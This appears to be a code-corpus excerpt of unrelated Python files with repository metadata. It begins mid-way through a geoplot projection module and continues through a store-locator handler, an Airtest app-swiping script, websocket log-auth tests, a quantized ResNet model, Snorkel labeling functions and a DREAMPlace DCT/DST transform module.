only a ``central_longitude`` instance parameter, implying that latitude is fixed (as
indeed it is, as this projection is centered on the North Pole!).
A top-level centerings method is provided in each of the ``geoplot`` top-level plot
functions; each of the projection wrapper classes defined here in turn selects the
functions from this list relevent to this particular instance and passes them to
the ``_generic_load`` method here.
We then in turn execute these functions to get defaults for our ``df`` and pass them
off to our output ``cartopy.crs`` instance.
Returns
-------
crs : ``cartopy.crs`` object instance
Returns a ``cartopy.crs`` object instance whose appropriate instance variables have
been set to reasonable defaults wherever not already provided by the user.
"""
return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args})
def _as_mpl_axes(self):
"""
When ``matplotlib`` is provided a projection via a ``projection`` keyword argument, it
expects to get something with a callable ``as_mpl_axes`` method. The precise details of
what this method does, exactly, are not important: it suffices to know that every
``cartopy`` coordinate reference system object has one.
When we pass a ``geoplot.crs`` crs object to a ``geoplot`` function, the loading and
centering of the data occurs automatically (using the function defined immediately above).
Since we control what ``geoplot`` does at execution, we gracefully integrate this two-step
procedure into the function body.
But there are also use cases outside of our control in which we are forced to pass a
``geoplot.crs`` object without having first called ``load``: most prominently, when
creating a plot containing subplots, the "overall" projection must be pre-loaded. It's
possible to get around this by using ``cartopy.crs`` objects instead, but this is
inelegant. This method is a better way: when a ``geoplot.crs`` object called by
``matplotlib``, it silently swaps itself out for a vanilla version of its ``cartopy.crs``
mirror, and calls that function's ``_as_mpl_axes`` instead.
Parameters
----------
proj : geoplot.crs projection instance
The instance in question (self, in the method body).
Returns
-------
Mutates into a ``cartopy.crs`` object and returns the result of executing ``_as_mpl_axes``
on that object instead.
"""
proj = self.load(gpd.GeoDataFrame(), dict())
return proj._as_mpl_axes()
class Filtering(Base):
"""CRS that `load`s with `centering` restricted to keys in `self.filter_`."""
def load(self, df, centerings):
"""Call `load` method with `centerings` filtered to keys in `self.filter_`."""
return super().load(
df,
{key: value
for key, value in centerings.items()
if key in self.filter_}
)
class LongitudeCentering(Filtering):
"""Form a CRS that centers by longitude."""
filter_ = {'central_longitude'}
class LatitudeCentering(Filtering):
"""For a CRS that centers by latitude."""
filter_ = {'central_latitude'}
PlateCarree,\
LambertCylindrical,\
Mercator,\
Miller,\
Mollweide,\
Robinson,\
Sinusoidal,\
InterruptedGoodeHomolosine,\
Geostationary,\
NorthPolarStereo,\
SouthPolarStereo = tuple(
type(name, (LongitudeCentering,), {})
for name in ('PlateCarree',
'LambertCylindrical',
'Mercator',
'Miller',
'Mollweide',
'Robinson',
'Sinusoidal',
'InterruptedGoodeHomolosine',
'Geostationary',
'NorthPolarStereo',
'SouthPolarStereo')
)
Gnomonic = type('Gnomonic', (LatitudeCentering,), {})
AlbersEqualArea,\
AzimuthalEquidistant,\
LambertConformal,\
Orthographic,\
Stereographic,\
TransverseMercator,\
LambertAzimuthalEqualArea,\
UTM,\
OSGB,\
EuroPP,\
OSNI = tuple(
type(name, (Base,), {})
for name in ('AlbersEqualArea',
'AzimuthalEquidistant',
'LambertConformal',
'Orthographic',
'Stereographic',
'TransverseMercator',
'LambertAzimuthalEqualArea',
'UTM',
'OSGB',
'EuroPP',
'OSNI')
)
| 2.71875 | 3 |
api/views/stores/att_handler.py | cderwin/maps | 0 | 1218 | from .default_handler import StoresHandler
class ATTStoresHandler(StoresHandler):
def handle_request(self, **kwargs):
kwargs.update({'provider': 'att'})
return super(ATTStoresHandler, self).handle_request(**kwargs)
def get_url(self, **kwargs):
lat = float(kwargs.get('lat'))
lon = float(kwargs.get('lon'))
sw_corner = "{0},{1}".format(lat - 1, lon - 1)
ne_corner = "{0},{1}".format(lat + 1, lon + 1)
return self.config[kwargs['provider']]['url'].format(lat=lat, lon=lon, sw_corner=sw_corner, ne_corner=ne_corner)
| 2.609375 | 3 |
pythonProject/MUNDO 2/Desafio 54.py | lucasjlgc/Aulas-de-Python- | 0 | 1219 | #Leia o ano de nascimento de 7 pessoas e mostre quantas ja atingiram a maioridade e quantas ainda não
for c in range(1,8):
p=int(input('Qual o ano de seu nascimento? '))
a=2021-p
if a>= 18:
print('A pessoa numero {} já é maior de idade'.format(c))
else:
print('A pessoa numero {} não é maior de idade!'.format(c))
| 3.859375 | 4 |
tmoga/utils/SDE.py | zjg540066169/tmoga | 2 | 1220 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Provide function to calculate SDE distance
@auth: <NAME>
@date: 2021/05/05
"""
def SDE(front, values1, values2):
shifted_dict = {}
for i in front:
shifted_dict[i] = [(values1[i], values2[i])]
shifted_list = []
for j in front:
if i == j:
continue
else:
shifted_list.append((min(values1[i], values1[j]), min(values2[i], values2[j])))
shifted_dict[i].append(shifted_list)
return shifted_dict
| 3.171875 | 3 |
a1.py | pscly/shua_shouji | 0 | 1221 | <filename>a1.py
# -*- encoding=utf8 -*-
__author__ = "pscly"
from airtest.core.api import *
from airtest.cli.parser import cli_setup
# from douyin import *
if not cli_setup():
auto_setup(__file__, logdir=True, devices=[
"android://127.0.0.1:5037/decc8da3?cap_method=MINICAP_STREAM&&ori_method=MINICAPORI&&touch_method=MINITOUCH",
])
# script content
print("start...")
print("冲冲冲!")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
wake() # 启动手机
start_app("com.ss.android.ugc.aweme.lite")
hua = 0
滑动方向 = 0
while 1:
hua += 1
滑动方向 += 1
if hua == 10:
touch(Template(r"tpl1607564875731.png", record_pos=(-0.404, -0.67), resolution=(1079, 2340)))
sleep(5)
swipe((484, 1711),(531,709))
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
print("-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=")
# generate html report
# from airtest.report.report import simple_report
# simple_report(__file__, logpath=True)
| 1.867188 | 2 |
tests/v3_validation/cattlevalidationtest/core/test_logs_api.py | bmdepesa/validation-tests | 7 | 1222 | from common_fixtures import * # NOQA
import websocket as ws
import pytest
def get_logs(client):
hosts = client.list_host(kind='docker', removed_null=True)
assert len(hosts) > 0
in_log = random_str()
cmd = '/bin/bash -c "echo {}; sleep 2"'.format(in_log)
c = client.create_container(image=TEST_IMAGE_UUID, command=cmd)
c = client.wait_success(c)
logs = c.logs()
return logs, in_log, c
def test_logs_token(client):
logs, in_log, c = get_logs(client)
conn = ws.create_connection(logs.url + '?token='+logs.token)
result = conn.recv()
assert result is not None
assert in_log in result
delete_all(client, [c])
def test_logs_no_token(client):
logs, _, c = get_logs(client)
with pytest.raises(Exception) as excinfo:
ws.create_connection(logs.url)
assert 'Handshake status 401' in str(excinfo.value)
delete_all(client, [c])
def test_host_api_garbage_token(client):
logs, _, c = get_logs(client)
with pytest.raises(Exception) as excinfo:
ws.create_connection(logs.url+'?token=random.garbage.token')
assert 'Handshake status 401' in str(excinfo.value)
delete_all(client, [c])
| 1.90625 | 2 |
models/psg_seed_resnet.py | VITA-Group/Peek-a-Boo | 2 | 1223 | '''ResNet using PSG in PyTorch.
For Pre-activation ResNet, see 'preact_resnet.py'.
Reference:
[1] <NAME>, <NAME>, <NAME>, <NAME>
Deep Residual Learning for Image Recognition. arXiv:1512.03385
'''
from numpy.lib.arraysetops import isin
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import numpy as np
from models.masked_psg_seed_conv import PredictiveSeedConv2d
from masked_layers import layers
# Fixed
NUM_BITS = 32
NUM_BITS_WEIGHT = 32
NUM_BITS_GRAD = None
BIPRECISION = False
PREDICTIVE_FORWARD = False
WRITER = None
WRITER_PREFIX_COUNTER = 0
# Tunable
PREDICTIVE_BACKWARD = True
MSB_BITS = 4
MSB_BITS_WEIGHT = 4
MSB_BITS_GRAD = 8
THRESHOLD = 0.0
SPARSIFY = False
SIGN = True
def conv1x1(in_planes, out_planes, stride=1, input_signed=True, predictive_forward=True, writer_prefix=""):
"1x1 convolution with no padding"
predictive_forward = PREDICTIVE_FORWARD and predictive_forward
return PredictiveSeedConv2d(
in_planes, out_planes, kernel_size=1, stride=stride, padding=0, bias=False,
num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
biprecision=BIPRECISION, input_signed=input_signed,
predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
writer=WRITER, writer_prefix=writer_prefix)
def conv3x3(in_planes, out_planes, stride=1, input_signed=False, predictive_forward=True, writer_prefix=""):
"3x3 convolution with padding"
predictive_forward = PREDICTIVE_FORWARD and predictive_forward
return PredictiveSeedConv2d(
in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False,
num_bits=NUM_BITS, num_bits_weight=NUM_BITS_WEIGHT, num_bits_grad=NUM_BITS_GRAD,
biprecision=BIPRECISION, input_signed=input_signed,
predictive_forward=predictive_forward, predictive_backward=PREDICTIVE_BACKWARD,
msb_bits=MSB_BITS, msb_bits_weight=MSB_BITS_WEIGHT, msb_bits_grad=MSB_BITS_GRAD,
threshold=THRESHOLD, sparsify=SPARSIFY, sign=SIGN,
writer=WRITER, writer_prefix=writer_prefix)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.conv1 = conv1x1(in_planes, planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(planes)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.conv2 = conv3x3(planes, planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn2 = nn.BatchNorm2d(planes)
# self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.conv3 = conv1x1(planes, self.expansion*planes, stride=1, input_signed=False, predictive_forward=False, writer_prefix=None)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
# nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),
conv1x1(in_planes, self.expansion*planes, stride=stride, input_signed=False, predictive_forward=False, writer_prefix=None),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, num_blocks, in_planes=64, num_classes=10, init_method='standard'):
super(ResNet, self).__init__()
self.in_planes = in_planes
self.conv1 = conv3x3(3, self.in_planes, stride=1, input_signed=True, predictive_forward=False, writer_prefix=None)
self.bn1 = nn.BatchNorm2d(self.in_planes)
if self.in_planes == 64:
# self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
#self.linear = layers.Linear(512*block.expansion, num_classes)
elif self.in_planes == 16:
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.layer4 = None
self.linear = nn.Linear(64, num_classes)
self.reset_conv_parameters(init_method)
print('conv weights reset to {}'.format(init_method))
def reset_parameters(self, module, init_method="kaiming_uniform") -> None:
if init_method == "kaiming_constant_signed":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "kaiming_constant_unsigned":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
std = gain / math.sqrt(fan)
with torch.no_grad():
module.weight.data = torch.ones_like(module.weight.data) * std
elif init_method == "kaiming_normal":
nn.init.kaiming_normal_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_uniform":
nn.init.kaiming_uniform_(module.weight, mode="fan_in", nonlinearity="relu")
elif init_method == "kaiming_laplace":
fan = nn.init._calculate_correct_fan(module.weight, "fan_in")
gain = nn.init.calculate_gain("relu")
scale = gain / math.sqrt(2.0 * fan)
with torch.no_grad():
new_weight = np.random.laplace(loc=0.0, scale=scale, size=module.weight.shape)
module.weight.data = module.weight.data.new_tensor(torch.from_numpy(new_weight).clone().detach())
elif init_method == "xavier_normal":
nn.init.xavier_normal_(module.weight)
elif init_method == "xavier_constant":
fan_in, fan_out = nn.init._calculate_fan_in_and_fan_out(module.weight)
std = math.sqrt(2.0 / float(fan_in + fan_out))
with torch.no_grad():
module.weight.data = module.weight.data.sign() * std
elif init_method == "standard":
nn.init.kaiming_uniform_(module.weight, a=math.sqrt(5))
else:
raise ValueError(f"{init_method} is not an initialization option!")
def reset_conv_parameters(self, init_method="standard") -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
self.reset_parameters(m, init_method)
def get_bop_params(self):
bop_params = []
for m in self.modules():
if isinstance(m, nn.Conv2d):
bop_params += list(m.parameters())
return bop_params
def get_non_bop_params(self):
non_bop_params = []
for m in self.modules():
if isinstance(m, (nn.Linear, nn.BatchNorm2d,)):
non_bop_params += list(m.parameters())
return non_bop_params
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
if self.layer4 is not None:
out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
out = F.avg_pool2d(out, out.size()[3])
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def PsgSeedResNet20(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [3,3,3], in_planes=16, num_classes=num_classes, init_method=init_method)
def PsgSeedResNet18(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [2,2,2,2], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet34(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(BasicBlock, [3,4,6,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet50(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,4,6,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet101(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,4,23,3], num_classes=num_classes, init_method=init_method)
def PsgSeedResNet152(
num_classes=10,
init_method='standard',
predictive_backward=True,
msb_bits=4,
msb_bits_weight=4,
msb_bits_grad=8,
threshold=0.0,
sparsify=False,
sign=True
):
global PREDICTIVE_BACKWARD, MSB_BITS, MSB_BITS_WEIGHT, MSB_BITS_GRAD, THRESHOLD, SPARSIFY, SIGN
PREDICTIVE_BACKWARD = predictive_backward
MSB_BITS = msb_bits
MSB_BITS_WEIGHT = msb_bits_weight
MSB_BITS_GRAD = msb_bits_grad
THRESHOLD = threshold
SPARSIFY = sparsify
SIGN = sign
return ResNet(Bottleneck, [3,8,36,3], num_classes=num_classes, init_method=init_method)
def test():
net = ResNet18()
y = net(torch.randn(1,3,32,32))
print(y.size())
# test()
| 2.71875 | 3 |
drybell/drybell_lfs_spark.py | jsnlp/snorkel-tutorials | 315 | 1224 | <filename>drybell/drybell_lfs_spark.py
from pyspark.sql import Row
from snorkel.labeling.lf import labeling_function
from snorkel.labeling.lf.nlp_spark import spark_nlp_labeling_function
from snorkel.preprocess import preprocessor
from drybell_lfs import load_celebrity_knowledge_base
ABSTAIN = -1
NEGATIVE = 0
POSITIVE = 1
@preprocessor()
def combine_text(x):
return Row(title=x.title, body=x.body, article=f"{x.title} {x.body}")
@spark_nlp_labeling_function(text_field="article", pre=[combine_text])
def article_mentions_person(x):
for ent in x.doc.ents:
if ent.label_ == "PERSON":
return ABSTAIN
return NEGATIVE
@spark_nlp_labeling_function(
text_field="article",
pre=[combine_text],
resources=dict(celebrity_knowledge_base=load_celebrity_knowledge_base()),
)
def person_in_db(x, celebrity_knowledge_base):
for ent in x.doc.ents:
if ent.label_ == "PERSON" and ent.text.lower() in celebrity_knowledge_base:
return POSITIVE
return ABSTAIN
@labeling_function()
def body_contains_fortune(x):
return POSITIVE if "fortune" in x.body else ABSTAIN
| 2.578125 | 3 |
dreamplace/ops/dct/discrete_spectral_transform.py | dongleecsu/DREAMPlace | 12 | 1225 | <gh_stars>10-100
##
# @file discrete_spectral_transform.py
# @author <NAME>
# @date Jun 2018
#
import os
import sys
import numpy as np
import torch
import torch.nn.functional as F
import pdb
""" Discrete spectral transformation leveraging fast fourier transform engine.
The math here mainly uses Prosthaphaeresis properties.
The trigonometric identities exploited by prosthaphaeresis relate products of trigonometric functions to sums.
sin(a) sin(b) = 1/2 * (cos(a-b) - cos(a+b))
cos(a) cos(b) = 1/2 * (cos(a-b) + cos(a+b))
sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b))
cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b))
A 2D FFT performs
y_{u, v} = \sum_i \sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N)
= \sum_i \sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N))
= \sum_i \sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))).
By mapping the original image from (i, j) to (i, N-j), we can have (u*i/M - v*j/N) inside exp.
This will enable us to derive various cos/sin transformation by computing FFT twice.
"""
def get_expk(N, dtype, device):
""" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same.
The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)).
This will make later multiplication easier.
"""
pik_by_2N = torch.arange(N, dtype=dtype, device=device)
pik_by_2N.mul_(np.pi/(2*N))
# cos, sin
# I use sin because the real part requires subtraction
# this will be easier for multiplication
expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1)
expk.mul_(2)
return expk.contiguous()
def get_expkp1(N, dtype, device):
""" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same.
The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N))
"""
neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device)
neg_pik_by_2N.mul_(np.pi/(2*N))
# sin, -cos
# I swap -cos and sin because we need the imag part
# this will be easier for multiplication
expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1)
expk.mul_(2)
return expk.contiguous()
def get_exact_expk(N, dtype, device):
# Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N))
pik_by_2N = torch.arange(N, dtype=dtype, device=device)
pik_by_2N.mul_(np.pi/(2*N))
# cos, -sin
expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1)
return expk.contiguous()
def get_perm(N, dtype, device):
""" Compute permutation to generate following array
0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1
"""
perm = torch.zeros(N, dtype=dtype, device=device)
perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device)
perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device)
return perm
def dct_2N(x, expk=None):
""" Batch Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)),
Impelements the 2N padding trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. Pad x by zeros
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
# pad last dimension
x_pad = F.pad(x, (0, N), 'constant', 0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :]
y.mul_(1.0/N)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# get real part
y.mul_(expk)
# I found add is much faster than sum
#y = y.sum(dim=-1)
return y[..., 0]+y[..., 1]
def dct_N(x, perm=None, expk=None):
""" Batch Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2i+1)*u/(2N)),
Impelements the N permuting trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. permute x such that [a, b, c, d, e, f] becomes [a, c, e, f, d, b]
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if perm is None:
perm = get_perm(N, dtype=torch.int64, device=x.device)
if x.ndimension() <= 1:
x_reorder = x.view([1, N])
else:
x_reorder = x.clone()
# switch from row-major to column-major for speedup
x_reorder.transpose_(dim0=-2, dim1=-1)
#x_reorder = x_reorder[..., perm, :]
x_reorder = x_reorder.index_select(dim=-2, index=perm)
# switch back
x_reorder.transpose_(dim0=-2, dim1=-1)
y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :]
y.mul_(1.0/N)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# get real part
y.mul_(expk)
# I found add is much faster than sum
#y = y.sum(dim=-1)
return y[..., 0]+y[..., 1]
def idct_2N(x, expk=None):
""" Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
Impelements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expk)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N]
y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def idct_N(x, expk=None):
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
size = list(x.size())
size.append(2)
x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device)
x_reorder[..., 0] = x
x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1)
x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1]))
x_reorder[..., 1].mul_(expk[..., 0])
x_reorder[..., 1].add_(x.mul(expk[..., 1]))
# this is to match idct_2N
# normal way should multiply 0.25
x_reorder.mul_(0.5)
y = torch.ifft(x_reorder, signal_ndim=1, normalized=False)
y.mul_(N)
z = torch.empty_like(x)
z[..., 0:N:2] = y[..., :(N+1)//2, 0]
z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1])
return z
def dst(x, expkp1=None):
""" Batch Discrete Sine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)),
Impelements the 2N padding trick to solve DCT with FFT in the following link,
https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft
1. Pad x by zeros
2. Perform FFT
3. Multiply by 2*exp(-1j*pi*u/(2N))
4. Extract the real part
"""
# last dimension
N = x.size(-1)
# pad last dimension
x_pad = F.pad(x, (0, N), 'constant', 0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :]
if expkp1 is None:
expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
# get imag part
y = y[..., 1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1])
return y
def idst(x, expkp1=None):
""" Batch Inverse Discrete Sine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
Impelements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
"""
# last dimension
N = x.size(-1)
if expkp1 is None:
expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expkp1)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1]
